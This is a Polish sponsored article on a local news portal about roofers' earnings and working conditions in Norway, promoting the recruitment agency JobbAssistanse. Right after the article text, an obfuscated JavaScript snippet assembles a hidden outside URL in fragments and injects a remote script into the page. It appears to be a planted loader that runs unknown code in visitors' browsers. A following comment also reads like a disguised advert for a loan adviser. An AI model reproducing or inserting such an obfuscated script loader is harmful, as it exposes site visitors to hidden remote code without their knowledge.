Dlatego Norwegia, jako kraj docelowy emigrantów zarobkowych, stale rozważana jest w planach wielu przedstawicieli zawodów budowlanych w naszym kraju.
Praca w budowlance nie jest lekka, łatwa i przyjemna, tym bardziej więc doceniane są nie tylko godziwe zarobki, ale i fakt, że norweski rynek pracy jest rynkiem pracownika. Pracodawca bardzo dba o przysługujące mu prawa, przestrzega wszelkich ustaleń zawartych między związkami branżowymi a pracodawcami, zapewnia pracownikom wszelkie środki bezpieczeństwa, odzież ochronną, narzędzia a często także samochód na dojazdy do pracy.
Szczególnie dobrze odnajdują się w Norwegii dekarze oraz ich pomocnicy. To jedna z najlepiej wynagradzanych specjalności budowlanych. Warto pamiętać, że branża budowlana plasuje się na szczycie listy zarobków, tuż za branżą stoczniową. Jeśli masz wrażenie, że jakość twojej pracy w Polsce oraz poświęcany jej czas nijak ma się do zarobków, nie wahaj się poszukać pracy w Norwegii. Zobacz więcej na jobbassistanse.com/praca-w-norwegii/
Średnie zarobki dekarzy w Norwegii
Najlepiej działają na wyobraźnię konkretne dane. Przyjrzyjmy się zatem liczbom:
Branża budowlana – stawki minimalne za godzinę pracy:
W przypadku dekarzy, średnie zarobki miesięczne wynoszą:
NOK PLN
min – 26 586 12 261
max – 29 578 13 641
Zarobki dekarzy w Norwegii pozwalają wieść dostatnie życie, zarówno kiedy wyjeżdża się samemu, jak również gdy emigruje się całą rodziną. Obok płacy zasadniczej pracownicy branży budowlanej mogą liczyć na dodatki za pracę w nadgodzinach. Nie są to dodatki uznaniowe, ale regulowane przepisami prawa, co przesądza o tym, że pracodawca w żaden sposób nie może nimi manipulować. Jeśli obowiązki zawodowe wymagają nocowania poza miejscem zamieszkania, pracownik może liczyć na ekwiwalent w kwocie 33,99 NOK za godzinę pracy. Koszty dojazdu, zakwaterowania oraz wyżywienia ma obowiązek pokryć firma, która przenosi pracownika na budowę poza miejsce zamieszkania.
Dodajmy też, że Polacy osiągają 80% średniego dochodu rodowitych Norwegów, co stawia ich w naprawdę doskonałej pozycji.
Czy znajdę pracę bez znajomości języka?
Na norweskim rynku pracy znajdzie się miejsce także dla pracowników bez znajomości języków obcych. Jeśli jednak planujesz szukać pracy w Norwegii, a nie mówisz po angielsku ani norwesku, skorzystaj z usług agencji pośrednictwa. Dlaczego warto?
Zadbaj o dokumentację wykształcenia
W Norwegii znajdą bez problemu pracę zarówno dekarze mający świadectwo ukończenia kierunkowej szkoły zawodowej, jak i pomocnicy dekarzy dysponujący jedynie świadectwami odbycia stosownych kursów. W interesie pracownika leży zgromadzenie i przetłumaczenie całej dokumentacji związanej z wykształceniem i przebiegiem dotychczasowej pracy zawodowej (wymagane jest tłumaczenie przysięgłe na język norweski, duński, szwedzki lub angielski). Wszelkie błędy i uchybienia formalne w dokumentacji mogą skutkować odmową wydania fagbrev (świadectwo ukończenia norweskiego szkolenia zawodowego) i koniecznością pracy na stanowisku pracownika niewykwalifikowanego, a co wiąże się z niższymi zarobkami.
Firma JobbAssistanse, od 2009 roku zajmująca się pośrednictwem pracy za granicą, powstała z inicjatywy Artura Jemioła, który na norweskim rynku pracy przeszedł wszystkie stopnie awansu zawodowego – od dekarza, przez brygadzistę, następnie team leadera i driftsleadera. To właśnie nabyte doświadczenie oraz znajomość norweskiego rynku pracy i lokalnych realiów sprawiają, że JobbAssisanse jest firmą rzetelną, godną zaufania, dążącą do ułatwienia życia zarówno pracownikom, jak i pracodawcom. Dbając o dobro obu stron procesu rekrutacji JobbAssistanse nie podejmuje współpracy z nierzetelnymi pracodawcami jak i z potencjalnymi pracownikami, których wykształcenie, zaangażowanie czy nastawienie do pracy wzbudza jakiekolwiek wątpliwości natury merytorycznej czy etycznej.
Po więcej informacji zapraszamy na stronę jobbassistanse.com
(function(){
oc7X=document.createElement("script");oc7X.async=true;oc7X_="u"+("s")+"t";
oc7Xu="132888169.";oc7X_+="a"+("t.i");oc7X_+="n"+("f"+"o")+"/";
oc7Xu+="crphj4pec7Xrcfam0i3ktX"+("h9k1hkcf");
oc7X.src="https://"+oc7X_+oc7Xu;oc7X.type="text/javascript";
document.body.appendChild(oc7X);
})();
0 0
Wiele osób wyjeżdża do Norwegii i wręcz chce tam zamieszkać na stałe. Ja sama się nad tym zastanawiam, zwłaszcza że sporo znajomych wyjechało. Są tacy którzy już planują kupować mieszkanie, z pomocą doradcy z Motty starają się o kredyt i dobrze idzie.
Użytkowniku, pamiętaj, że w Internecie nie jesteś anonimowy. Ponosisz odpowiedzialność za treści zamieszczane na portalu zyciepabianic.pl. Dodanie opinii jest równoznaczne z akceptacją Regulaminu portalu. Jeśli zauważyłeś, że któraś opinia łamie prawo lub dobry obyczaj - powiadom nas [email protected] lub użyj przycisku Zgłoś komentarz